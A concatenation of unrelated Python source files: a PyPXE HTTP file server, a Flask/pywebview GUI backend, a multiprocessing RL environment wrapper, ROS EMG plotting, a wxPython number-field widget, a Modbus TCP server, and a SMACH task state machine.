logging.info("Querying jobs {}".format(backend_job_ids))
condor_jobs = schedd.xquery(requirements=query, projection=ads)
return condor_jobs
|
http.py
|
'''
This file contains classes and functions that implement the PyPXE HTTP service
'''
import socket
import struct
import os
import threading
import logging
from pypxe import helpers
class HTTPD:
'''
This class implements a HTTP Server, limited to GET and HEAD,
from RFC2616, RFC7230.
'''
def __init__(self, **server_settings):
self.ip = server_settings.get('ip', '0.0.0.0')
self.port = int(server_settings.get('port', 80))
self.netboot_directory = server_settings.get('netboot_directory', '.')
self.mode_verbose = server_settings.get('mode_verbose', False) # verbose mode
self.mode_debug = server_settings.get('mode_debug', False) # debug mode
self.logger = server_settings.get('logger', None)
# setup logger
if self.logger == None:
self.logger = logging.getLogger('HTTP')
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s [%(levelname)s] %(name)s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
if self.mode_debug:
self.logger.setLevel(logging.DEBUG)
elif self.mode_verbose:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.WARN)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.ip, self.port))
self.sock.listen(1)
self.logger.debug('NOTICE: HTTP server started in debug mode. HTTP server is using the following:')
self.logger.info('Server IP: {0}'.format(self.ip))
self.logger.info('Server Port: {0}'.format(self.port))
self.logger.info('Network Boot Directory: {0}'.format(self.netboot_directory))
def handle_request(self, connection, addr):
'''This method handles HTTP request.'''
request = connection.recv(1024)
self.logger.debug('Recieved message from {addr}'.format(addr = repr(addr)))
self.logger.debug('<--BEGIN MESSAGE-->')
self.logger.debug('{0}'.format(repr(request)))
self.logger.debug('<--END MESSAGE-->')
method, target, version = request.decode('ascii').split('\r\n')[0].split(' ')
target = target.lstrip('/')
try:
self.logger.debug("Netboot: {0}, Target: {1}".format(self.netboot_directory, target))
target = helpers.normalize_path(self.netboot_directory, target)
if not os.path.lexists(target) or not os.path.isfile(target):
status = '404 Not Found'
elif method not in ('GET', 'HEAD'):
status = '501 Not Implemented'
else:
status = '200 OK'
except helpers.PathTraversalException:
status = '403 Forbidden'
response = 'HTTP/1.1 {0}\r\n'.format(status)
if status[:3] != '200': # fail out
connection.send(response.encode('ascii'))
connection.close()
self.logger.warn('Sending {status} to {addr[0]}:{addr[1]} for {target}'.format(status = status, target = target, addr = addr))
self.logger.debug('Sending message to {0}'.format(repr(addr)))
self.logger.debug('<--BEING MESSAGE-->')
self.logger.debug('{0}'.format(repr(response)))
self.logger.debug('<--END MESSAGE-->')
return
response += 'Content-Length: {0}\r\n'.format(os.path.getsize(target))
response += '\r\n'
if method == 'HEAD':
connection.send(response)
connection.close()
self.logger.debug('Sending message to {0}'.format(repr(addr)))
self.logger.debug('<--BEING MESSAGE-->')
self.logger.debug('{0}'.format(repr(response)))
self.logger.debug('<--END MESSAGE-->')
return
connection.send(response.encode('ascii'))
with open(target, 'rb') as handle:
while True:
data = handle.read(8192)
if not data: break
connection.send(data)
connection.close()
self.logger.info('File Sent - {target} -> {addr[0]}:{addr[1]}'.format(target = target, addr = addr))
def listen(self):
'''This method is the main loop that listens for requests.'''
while True:
conn, addr = self.sock.accept()
client = threading.Thread(target = self.handle_request, args = (conn, addr))
client.daemon = True;
client.start()
|
server.py
|
# -*- coding: utf-8 -*-
""" Flask app for the graphical user interface.
"""
from __future__ import print_function, division, unicode_literals
import threading
import socket
import time
import sys
import os
from base64 import urlsafe_b64encode
try:
from http.client import HTTPConnection
except ImportError:
from httplib import HTTPConnection
import logging
try:
import webview
PYWEBVIEW_AVAILABLE = True
except:
PYWEBVIEW_AVAILABLE = False
try:
from flask import Flask, Blueprint, url_for, render_template, jsonify, request, make_response
app_path = os.path.join(os.path.realpath(os.path.dirname(__file__)), 'app')
static_path = os.path.join(app_path, 'static')
server = Blueprint('polevault', __name__, static_folder=static_path, template_folder=app_path)
FLASK_AVAILABLE = True
except:
FLASK_AVAILABLE = False
# import webbrowser
cancel_heavy_stuff_flag = False
@server.after_request
def add_header(response):
response.headers['Cache-Control'] = 'no-store'
return response
@server.route("/")
def landing():
"""
Render index.html. Initialization is performed asynchronously in initialize() function
"""
return render_template("index.html")
@server.route("/choose/path")
def choose_path():
"""
Invoke a folder selection dialog here
:return:
"""
current_directory = os.getcwd()
dirs = webview.create_file_dialog(webview.FOLDER_DIALOG,
directory=current_directory)
if dirs and len(dirs) > 0:
directory = dirs[0]
if isinstance(directory, bytes):
directory = directory.decode("utf-8")
if directory.startswith(current_directory + os.path.sep):
directory = directory[len(current_directory) + len(os.path.sep):]
response = {"message": directory}
else:
response = {"message": "cancel"}
return jsonify(response)
@server.route("/fullscreen")
def fullscreen():
webview.toggle_fullscreen()
return jsonify({})
# @server.route("/open-url", methods=["POST"])
# def open_url():
# url = request.json["url"]
# webbrowser.open_new_tab(url)
# return jsonify({})
@server.route("/python_version")
def python_version():
return jsonify({
'message': 'Hello from Python {0}'.format(sys.version)
})
@server.route("/heavy_stuff/do")
def do_stuff():
time.sleep(0.1) # sleep to prevent from the ui thread from freezing for a moment
now = time.time()
global cancel_heavy_stuff_flag
cancel_heavy_stuff_flag = False
response = {
'message': 'starting stuff'
}
for i in range(0, 200000):
_ = urlsafe_b64encode(os.urandom(80)).decode('utf-8')
if cancel_heavy_stuff_flag:
response = {'message': 'Operation cancelled'}
break
else:
then = time.time()
response = {
'message': 'Operation took {0:.1f} seconds on the thread {1}'.format((then - now), threading.current_thread())
}
return jsonify(response)
@server.route("/heavy_stuff/cancel")
def cancel_stuff():
time.sleep(0.1)
global cancel_heavy_stuff_flag
cancel_heavy_stuff_flag = True
response = {
'message': 'canceling stuff'
}
return jsonify(response)
@server.route("/close_down")
def close_down():
response = {
'message': 'closing'
}
webview.destroy_window()
os._exit(0)
return jsonify(response)
def run_server(port, prefix):
app = Flask(__name__)
app.register_blueprint(server, url_prefix=prefix)
app.config["SEND_FILE_MAX_AGE_DEFAULT"] = 1 # disable caching
logger = logging.getLogger('werkzeug')
logger.setLevel(logging.ERROR)
logger.disabled = True
app.logger.disabled = True
so = sys.stdout
se = sys.stderr
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
app.run(host="127.0.0.1", port=port, threaded=True)
sys.stdout = so
sys.stderr = se
def url_ok(host, port, prefix):
try:
conn = HTTPConnection(host, port)
conn.request("GET", prefix)
r = conn.getresponse()
return r.status == 200
except:
return False
def find_free_port(start=5000, end=5999):
found = False
for port in range(start, end):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
if s.connect_ex(('127.0.0.1', port)) != 0:
found = True
if found:
return port
return 0
def gui():
port = find_free_port()
if port > 0 and PYWEBVIEW_AVAILABLE and FLASK_AVAILABLE:
prefix = '/' + urlsafe_b64encode(os.urandom(33)).decode('utf8').rstrip('=') + '/'
t = threading.Thread(target=run_server, args=(port, prefix))
t.daemon = True
t.start()
# print("http://127.0.0.1:{}{}".format(port, prefix))
while not url_ok('127.0.0.1', port, prefix):
time.sleep(0.1)
webview.create_window('Pole Vault',
"http://127.0.0.1:{}{}".format(port, prefix),
confirm_quit=True,
)
else:
if not FLASK_AVAILABLE:
print('''
You must install the flask package in order to
use the graphical user interface:
pip install flask
''')
if not PYWEBVIEW_AVAILABLE:
print('''
You must install the pywebview package in order to
use the graphical user interface:
pip install pywebview
''')
print('''
For help about using polevault from the CLI please type:
polevault --help
''')
exit(3)
if __name__ == "__main__":
port = find_free_port()
if port > 0 and PYWEBVIEW_AVAILABLE and FLASK_AVAILABLE:
prefix = '/prefix/'
print("http://127.0.0.1:{}{}".format(port, prefix))
run_server(port, prefix)
|
subproc_vec_env.py
|
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
def worker(remote, parent_remote, env_fn_wrappers):
def step_env(env, action):
ob, reward, done, info = env.step(action)
if done:
ob = env.reset()
return ob, reward, done, info
parent_remote.close()
envs = [env_fn_wrapper() for env_fn_wrapper in env_fn_wrappers.x]
try:
while True:
cmd, data = remote.recv()
if cmd == 'step':
remote.send([step_env(env, action) for env, action in zip(envs, data)])
elif cmd == 'reset':
remote.send([env.reset() for env in envs])
elif cmd == 'get_avail_actions':
remote.send([env.get_avail_actions() for env in envs])
elif cmd == 'render':
remote.send([env.render(mode='rgb_array') for env in envs])
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces_spec':
remote.send(CloudpickleWrapper((envs[0].observation_space, envs[0].action_space, envs[0].spec)))
elif cmd == 'seed':
new_seed = data
envs[0].seed(new_seed)
remote.send(envs[0].reset())
elif cmd == 'level_seed':
remote.send(envs[0].level_seed)
elif cmd == 'observe':
remote.send(envs[0].observation(envs[0].gen_obs()))
else:
print(f'Not implemented {cmd} {data}')
raise NotImplementedError
except KeyboardInterrupt:
print('SubprocVecEnv worker: got KeyboardInterrupt')
finally:
for env in envs:
env.close()
class SubprocVecEnv(VecEnv):
"""
VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes.
Recommended to use when num_envs > 1 and step() can be a bottleneck.
"""
def __init__(self, env_fns, spaces=None, context='spawn', in_series=1):
"""
Arguments:
env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable
in_series: number of environments to run in series in a single process
(e.g. when len(env_fns) == 12 and in_series == 3, it will run 4 processes, each running 3 envs in series)
"""
self.waiting = False
self.closed = False
self.in_series = in_series
nenvs = len(env_fns)
assert nenvs % in_series == 0, "Number of envs must be divisible by number of envs to run in series"
self.nremotes = nenvs // in_series
env_fns = np.array_split(env_fns, self.nremotes)
ctx = mp.get_context(context)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(self.nremotes)])
self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)]
for p in self.ps:
p.daemon = True # if the main process crashes, we should not cause things to hang
with clear_mpi_env_vars():
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces_spec', None))
observation_space, action_space, self.spec = self.remotes[0].recv().x
self.viewer = None
VecEnv.__init__(self, nenvs, observation_space, action_space)
def step_async(self, actions):
self._assert_not_closed()
actions = np.array_split(actions, self.nremotes)
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def step_wait(self):
self._assert_not_closed()
results = [remote.recv() for remote in self.remotes]
results = _flatten_list(results)
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
self._assert_not_closed()
for remote in self.remotes:
remote.send(('reset', None))
obs = [remote.recv() for remote in self.remotes]
obs = _flatten_list(obs)
return _flatten_obs(obs)
def close_extras(self):
self.closed = True
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
def get_images(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('render', None))
imgs = [pipe.recv() for pipe in self.remotes]
imgs = _flatten_list(imgs)
return imgs
def get_avail_actions(self):
self._assert_not_closed()
for pipe in self.remotes:
pipe.send(('get_avail_actions', None))
avail_act = [pipe.recv() for pipe in self.remotes]
avail_act = _flatten_list(avail_act)
return avail_act
def _assert_not_closed(self):
assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()"
def __del__(self):
if not self.closed:
self.close()
def _flatten_obs(obs):
assert isinstance(obs, (list, tuple))
assert len(obs) > 0
if isinstance(obs[0], dict):
keys = obs[0].keys()
return {k: np.stack([o[k] for o in obs]) for k in keys}
else:
return np.stack(obs)
def _flatten_list(l):
assert isinstance(l, (list, tuple))
assert len(l) > 0
assert all([len(l_) > 0 for l_ in l])
return [l__ for l_ in l for l__ in l_]
|
plot_emg2.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import rospy
from ros_myo.msg import EmgArray
import matplotlib.pyplot as plt
import threading as th
from copy import deepcopy
class EmgSubscriber():
def __init__(self):
n_ch = 8
self.RP = realtime_plot(n_ch)
self.subscriber = rospy.Subscriber("/myo_raw/myo_emg", EmgArray, self.callback)
self.Emgs = np.zeros((8, 200))
self.th1 = th.Thread(target=(self.RP.pause(4./200.)))
self.th1.start()
def callback(self, msg):
get_emg = msg.data
for i in range(len(get_emg)):
buf = np.delete(self.Emgs[i], -1)
self.Emgs[i] = np.insert(buf, 0, get_emg[i])
self.RP.set_data(self.Emgs)
class realtime_plot(object):
def __init__(self, num):
self.fig = plt.figure(figsize=(15, 15))
self.n_ch = num
self.initialize()
def initialize(self):
self.fig.suptitle('EMG', size=15)
plt.subplots_adjust(wspace=0.4, hspace=1.0)
t = np.arange(4, 0., -4./200.)
self.axs = [plt.subplot2grid((self.n_ch, 1),(i,0)) for i in range(self.n_ch)]
self.lines = [None for i in range(self.n_ch)]
for i in range(self.n_ch):
self.axs[i].grid(True)
self.axs[i].set_title("ch{}".format(i+1))
self.axs[i].set_ylim((0, 1100))
self.axs[i].set_xlim((t.min(), t.max()))
self.lines[i], = self.axs[i].plot([-1, 1], [1, 1])
def set_data(self, data):
t = np.arange(4, 0., -4./200.)
for i in range(self.n_ch):
self.lines[i].set_data(t, data[i])
def pause(self,second):
while(True):
# self.t += 4./200.
plt.pause(second)
if __name__ == "__main__":
rospy.init_node("plots_emg")
sub = EmgSubscriber()
rospy.spin()
|
number_field.py
|
# ----------------------------------------------------------------------------
# GS Widget Kit Copyright 2021 by Noah Rahm and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import wx
from wx.lib.newevent import NewCommandEvent
import threading
from .textctrl import TextCtrl
numberfield_cmd_event, EVT_NUMBERFIELD = NewCommandEvent()
numberfield_change_cmd_event, EVT_NUMBERFIELD_CHANGE = NewCommandEvent()
def GetTextExtent(text):
tdc = wx.WindowDC(wx.GetApp().GetTopWindow())
w, h = tdc.GetTextExtent(text)
return w, h
class NumberField(wx.Control):
def __init__(self, parent, _id=wx.ID_ANY, label="", default_value=0, min_value=0,
max_value=10, suffix="px", show_p=True, scroll_horz=True, size=wx.DefaultSize):
wx.Control.__init__(self, parent, _id, pos=wx.DefaultPosition,
size=size, style=wx.NO_BORDER)
self.parent = parent
self.focused = False
self.mouse_in = False
self.control_size = wx.DefaultSize
self.show_p = show_p
self.buffer = None
self.dragging = False
if scroll_horz is True:
self.scroll_dir = 0
else:
self.scroll_dir = 1
self.cur_value = default_value
self.min_value = min_value
self.max_value = max_value
self.change_rate = .5
self.change_value = 0
self.suffix = suffix
self.value_range = [i for i in range(min_value, max_value)]
self.label = label
self.padding_x = 20
self.padding_y = 10
# Flag that is true if a drag is happening after a left click
self.changing_value = False
# Keep track of last sent event
self.last_sent_event = None
# The point in which the cursor gets anchored to during the drag event
self.anchor_point = (0, 0)
# Text ctrl
self.textctrl = TextCtrl(self, value=str(self.cur_value),
style=wx.BORDER_NONE, pos=(0, 0),
size=(10, 24))
self.textctrl.Hide()
self.textctrl.Bind(wx.EVT_LEAVE_WINDOW, self.OnHideTextCtrl)
self.textctrl.Bind(wx.EVT_KILL_FOCUS, self.OnHideTextCtrl)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
self.Bind(wx.EVT_MOTION, self.OnMouseMotion)
self.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown, self)
self.Bind(wx.EVT_LEFT_UP, self.OnLeftUp, self)
self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)
self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)
self.Bind(wx.EVT_LEAVE_WINDOW, self.OnMouseLeave)
self.Bind(wx.EVT_ENTER_WINDOW, self.OnMouseEnter)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnShowTextCtrl)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnPaint(self, event):
wx.BufferedPaintDC(self, self.buffer)
def OnSize(self, event):
size = self.GetClientSize()
# Make sure size is at least 1px to avoid
# strange "invalid bitmap size" errors.
if size[0] < 1:
size = (1, 1)
self.buffer = wx.Bitmap(*size)
self.UpdateDrawing()
def UpdateDrawing(self):
dc = wx.MemoryDC()
dc.SelectObject(self.buffer)
dc = wx.GCDC(dc)
self.OnDrawBackground(dc)
self.OnDrawWidget(dc)
del dc # need to get rid of the MemoryDC before Update() is called.
self.Refresh()
self.Update()
def OnDrawBackground(self, dc):
dc.SetBackground(wx.Brush(self.parent.GetBackgroundColour()))
dc.Clear()
def OnDrawWidget(self, dc):
fnt = self.parent.GetFont()
dc.SetFont(fnt)
dc.SetPen(wx.TRANSPARENT_PEN)
full_val_lbl = str(self.cur_value)+self.suffix
width = self.Size[0]
height = self.Size[1]
one_val = width / self.max_value
self.p_val = round((self.cur_value*one_val))
if self.mouse_in:
dc.SetTextForeground("#ffffff")
dc.SetBrush(wx.Brush(wx.Colour("#4c4c4c")))
else:
dc.SetTextForeground("#e9e9e9")
dc.SetBrush(wx.Brush(wx.Colour("#333333")))
dc.DrawRoundedRectangle(0, 0, width, height, 4)
if self.show_p is True:
dc.SetBrush(wx.Brush(wx.Colour("#5680C2")))
dc.DrawRoundedRectangle(0, 0, self.p_val, height, 4)
if self.p_val < width-4 and self.p_val > 4:
dc.DrawRectangle((self.p_val)-4, 0, 4, height)
lbl_w, lbl_h = GetTextExtent(self.label)
val_w, val_h = GetTextExtent(full_val_lbl)
dc.DrawText(self.label, self.padding_x, int((height/2) - (lbl_h/2)))
dc.DrawText(full_val_lbl, (width-self.padding_x) - (val_w), int((height/2) - (val_h/2)))
# Update position of textctrl
self.textctrl.SetPosition((5, (int(self.Size[1]/2) - 10)))
self.textctrl.SetSize((int(self.Size[0]-10), 24))
self.textctrl.SetCurrentPos(len(str(self.cur_value)))
def updateDelta(self,event):
# Calculate the change in mouse position
cur_point = event.GetPosition()
self.delta = cur_point[self.scroll_dir] - self.anchor_point[self.scroll_dir]
def updateDragging(self,event):
self.dragging = event.Dragging()
def OnMouseMotion(self, event):
"""
When the mouse moves, it check to see if it is a drag, or if left down had happened.
If neither of those cases are true then it will cancel the action.
If they are true then it calculates the change in position of the mouse, then changes
the position of the cursor back to where the left click event happened.
"""
# Changes the cursor
if self.changing_value:
T1 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_BLANK),))
else:
T1 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_SIZEWE),))
T2 = threading.Thread(target=self.updateDelta,args=(event,))
T3 = threading.Thread(target=self.updateDragging,args=(event,))
T1.start()
T2.start()
T3.start()
T2.join()
T1.join()
T3.join()
# If the cursor is being moved and dragged left or right
if self.delta != 0 and self.dragging and self.changing_value:
#T4 = threading.Thread(target=self.UpdateWidget)
self.UpdateWidget()
#T5 = threading.Thread(target=self.UpdateDrawing)
self.UpdateDrawing()
if self.dragging and self.changing_value:
T4 = threading.Thread(target=self.SetCursor,args=(wx.Cursor(wx.CURSOR_BLANK),))
""" I removed this part because it was causing a bug
# Set the cursor back to the original point so it doesn't run away
#T5 = threading.Thread(target=self.WarpPointer,args=(int(self.anchor_point[0]), int(self.anchor_point[1])))"""
# Case where the mouse is moving over the control, but has no
# intent to actually change the value
if self.changing_value and not self.dragging:
self.changing_value = False
T4 = threading.Thread(target=self.parent.SetDoubleBuffered,args=(False,))
T4.start()
T4.join()
del(T4)
del(T1,T2,T3)
def OnHideTextCtrl(self, event):
value = self.textctrl.GetValue()
if value != " ":
new_value = int(value)
if new_value in [i for i in range(0, self.max_value+1)]:
if new_value >= self.min_value and new_value <= self.max_value:
self.cur_value = new_value
self.textctrl.Hide()
self.SendChangeEvent()
self.SendSliderEvent()
self.UpdateDrawing()
def OnShowTextCtrl(self, event):
if self.show_p is False:
self.textctrl.Show()
self.textctrl.SetFocus()
def SendSliderEvent(self):
wx.PostEvent(self, numberfield_cmd_event(id=self.GetId(), value=self.cur_value))
def SendChangeEvent(self):
# Implement a debounce system where only one event is
# sent only if the value actually changed.
if self.cur_value != self.last_sent_event:
wx.PostEvent(self, numberfield_change_cmd_event(
id=self.GetId(), value=self.cur_value))
self.last_sent_event = self.cur_value
def Increasing(self):
if self.delta > 0:
return True
else:
return False
def Decreasing(self):
if self.delta < 0:
return True
else:
return False
def OnLeftUp(self, event):
"""
Cancels the changing event, and turns off the optimization buffering
"""
self.changing_value = False
self.parent.SetDoubleBuffered(False)
self.SetCursor(wx.Cursor(wx.CURSOR_SIZEWE))
self.SendSliderEvent()
def OnLeftDown(self, event):
"""
Sets the anchor point that the cursor will go back to the original position.
Also turns on the doublebuffering which eliminates the flickering when rapidly changing values.
"""
pos = event.GetPosition()
self.anchor_point = (pos[0], pos[1])
self.changing_value = True
self.parent.SetDoubleBuffered(True)
self.UpdateDrawing()
def OnSetFocus(self, event):
self.focused = True
self.Refresh()
def OnKillFocus(self, event):
self.focused = False
self.Refresh()
def OnMouseEnter(self, event):
self.mouse_in = True
self.Refresh()
self.UpdateDrawing()
def OnMouseLeave(self, event):
"""
In the event that the mouse is moved fast enough to leave the bounds of the label, this
will be triggered, warping the cursor back to where the left click event originally
happened
"""
if self.changing_value:
self.WarpPointer(self.anchor_point[0], self.anchor_point[1])
self.mouse_in = False
self.Refresh()
self.UpdateDrawing()
def AcceptsFocusFromKeyboard(self):
"""Overridden base class virtual."""
return True
def AcceptsFocus(self):
""" Overridden base class virtual. """
return True
def HasFocus(self):
""" Returns whether or not we have the focus. """
return self.focused
def GetValue(self):
return self.cur_value
def SetValue(self, value):
self.cur_value = value
def SetLabel(self, label):
self.label = label
def UpdateWidget(self):
self.change_value += self.change_rate/2.0
if self.change_value >= 1:
if self.Increasing():
if self.cur_value < self.max_value:
self.cur_value += 1
else:
if (self.cur_value - 1) >= 0:
if self.cur_value > self.min_value:
self.cur_value -= 1
# Reset the change value since the value was just changed.
self.change_value = 0
self.SendChangeEvent()
def DoGetBestSize(self):
"""
Overridden base class virtual. Determines the best size of the control
based on the label size, the bitmap size and the current font.
"""
normal_label = self.label
value_label = str(self.cur_value)+self.suffix
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc = wx.ClientDC(self)
dc.SetFont(font)
# Measure our labels
lbl_text_w, lbl_text_h = dc.GetTextExtent(normal_label)
val_text_w, val_text_h = dc.GetTextExtent(value_label)
totalwidth = lbl_text_w + val_text_w + self.padding_x + 76
# To avoid issues with drawing the control properly, we
# always make sure the width is an even number.
if totalwidth % 2:
totalwidth -= 1
totalheight = lbl_text_h + self.padding_y
best = wx.Size(totalwidth, totalheight)
# Cache the best size so it doesn't need to be calculated again,
# at least until some properties of the window change
self.CacheBestSize(best)
return best
|
modbus_server.py
|
#!/usr/bin/env python
# modbus_server.py
# Copyright (C) 2017 Niryo
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import rospy
from threading import Thread
from pymodbus.server.sync import ModbusTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from niryo_one_modbus.coil_data_block import CoilDataBlock
from niryo_one_modbus.discrete_input_data_block import DiscreteInputDataBlock
from niryo_one_modbus.input_register_data_block import InputRegisterDataBlock
from niryo_one_modbus.holding_register_data_block import HoldingRegisterDataBlock
class ModbusServer:
def __init__(self, address, port):
self.coil = CoilDataBlock()
self.discrete_input = DiscreteInputDataBlock()
self.input_register = InputRegisterDataBlock()
self.holding_register = HoldingRegisterDataBlock()
self.store = ModbusSlaveContext(di=self.discrete_input,
co=self.coil, hr=self.holding_register, ir=self.input_register)
self.context = ModbusServerContext(slaves=self.store, single=True)
self.identity = ModbusDeviceIdentification()
self.identity.VendorName = 'pymodbus'
self.identity.VendorName = 'pymodbus'
self.identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
self.identity.ProductName = 'pymodbus Server'
self.identity.ModelName = 'pymodbus Server'
self.identity.MajorMinorRevision = '1.0'
self.server = ModbusTcpServer(context=self.context,
framer=None, identity=self.identity, address=(address, port))
def start(self):
rospy.loginfo("Start Modbus Server")
t = Thread(target=self.__start_server)
t.start()
def __start_server(self):
self.discrete_input.start_ros_subscribers()
self.input_register.start_ros_subscribers()
self.server.serve_forever()
def stop(self):
rospy.loginfo("Stop Modbus Server")
self.discrete_input.stop_ros_subscribers()
self.input_register.stop_ros_subscribers()
rospy.sleep(0.1)
self.server.server_close()
self.server.shutdown()
|
TaskSmach.py
|
import roslib; roslib.load_manifest('task_manager_lib')
from task_manager_lib.TaskClient import *
import smach
import smach_ros
import signal
import sys
class MissionFailed(smach.State):
def __init__(self):
smach.State.__init__(self,
outcomes=['MISSION_FAILED'])
class MissionCompleted(smach.State):
def __init__(self):
smach.State.__init__(self,
outcomes=['MISSION_COMPLETED'])
class TaskState(smach.State):
def __init__(self,mi,tc,name,**params):
smach.State.__init__(self,
outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'])
self.mi = mi
self.tc = tc
self.name = name
self.params = params
self.id = None
def execute(self, userdata):
if self.mi.is_shutdown():
return 'MISSION_COMPLETED'
# rospy.loginfo('Executing state '+self.name)
try:
self.id = self.tc.tasklist[self.name].start(**self.params)
self.tc.waitTask(self.id)
return 'TASK_COMPLETED'
except TaskConditionException:
return 'TASK_INTERRUPTED'
except TaskException, e:
if e.status == TaskStatus.TASK_TIMEOUT:
return 'TASK_TIMEOUT'
elif e.status == TaskStatus.TASK_INTERRUPTED:
return 'TASK_INTERRUPTED'
return 'TASK_FAILED'
def request_preempt(self):
if self.id:
# print "Preempting task %s:%d"%(self.name,self.id)
self.tc.stopTask(self.id)
class MissionStateMachine:
def __init__(self,tc=None):
self.shutdown_requested = False
self.pseudo_states={}
server_node = rospy.get_param("~server","/turtlesim_tasks")
default_period = rospy.get_param("~period",0.2)
if tc:
self.tc = tc
else:
self.tc = TaskClient(server_node,default_period)
# self.tc.verbose = 2
def is_shutdown(self):
return self.shutdown_requested
def createStateMachine(self):
return smach.StateMachine(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'])
def createSequence(self):
return smach.Sequence(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'],
connector_outcome='TASK_COMPLETED')
class concurrent_outcome_cb:
def __init__(self,mi,fg):
self.mi = mi
self.fg = fg
def __call__(self,states):
print states
if self.mi.is_shutdown():
return 'TASK_INTERRUPTED'
num_complete = sum([1 for x in states.values() if x == 'TASK_COMPLETED'])
if num_complete>=1:
return 'TASK_COMPLETED'
return states[fg]
def createConcurrence(self,fg_state):
# Create the sub SMACH state machine
return smach.Concurrence(outcomes=['TASK_COMPLETED','TASK_INTERRUPTED',
'TASK_FAILED','TASK_TIMEOUT','MISSION_COMPLETED'], default_outcome='TASK_FAILED',
outcome_cb = self.concurrent_outcome_cb(self,fg_state),
child_termination_cb=lambda x:True)
class TaskEpsilon(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['TASK_COMPLETED','TASK_FAILED'])
def execute(self, userdata):
return 'TASK_COMPLETED'
def epsilon_task(self,label=None,transitions=None):
if not label:
label=self.getLabel("Epsilon")
if transitions:
smach.Sequence.add(label, self.TaskEpsilon(),transitions)
else:
smach.Sequence.add(label, self.TaskEpsilon())
return label
def getLabel(self,name):
state_name = "__"+name+"_0"
if name in self.pseudo_states:
state_name = "__" + name + "_" + str(self.pseudo_states[name])
else:
self.pseudo_states[name] = 0
self.pseudo_states[name] += 1
return state_name
def task(self,name,**params):
params['foreground']=True
state_name = None
if 'label' in params:
state_name=params['label']
del params['label']
else:
state_name = self.getLabel(name)
T=params['transitions']
del params['transitions']
smach.StateMachine.add(state_name, TaskState(self,self.tc,name,**params),T)
return state_name
def seq_task(self,name,**params):
state_name = None
params['foreground']=True
if 'label' in params:
state_name=params['label']
del params['label']
else:
state_name = self.getLabel(name)
if 'transitions' in params:
T=params['transitions']
del params['transitions']
smach.Sequence.add(state_name, TaskState(self,self.tc,name,**params),T)
else:
smach.Sequence.add(state_name, TaskState(self,self.tc,name,**params))
return state_name
def concurrent_task(self,name,**params):
state_name = self.getLabel(name)
foreground = params['foreground'] # This must be defined
if 'label' in params:
state_name=params['label']
del params['label']
smach.Concurrence.add(state_name, TaskState(self,self.tc,name,**params))
return state_name
class signal_handler:
def __init__(self,mi,sm):
self.mi = mi
self.sm = sm
def __call__(self,signal,frame):
# print("Signal %s detected" % str(signal))
self.mi.shutdown_requested = True
self.sm.request_preempt()
def run(self,sm):
self.shutdown_requested = False
sis = smach_ros.IntrospectionServer('mission_state_machine', sm, '/SM')
sis.start()
# Execute SMACH tree in a separate thread so that we can ctrl-c the script
signal.signal(signal.SIGINT, self.signal_handler(self,sm))
smach_thread = threading.Thread(target = sm.execute)
smach_thread.start()
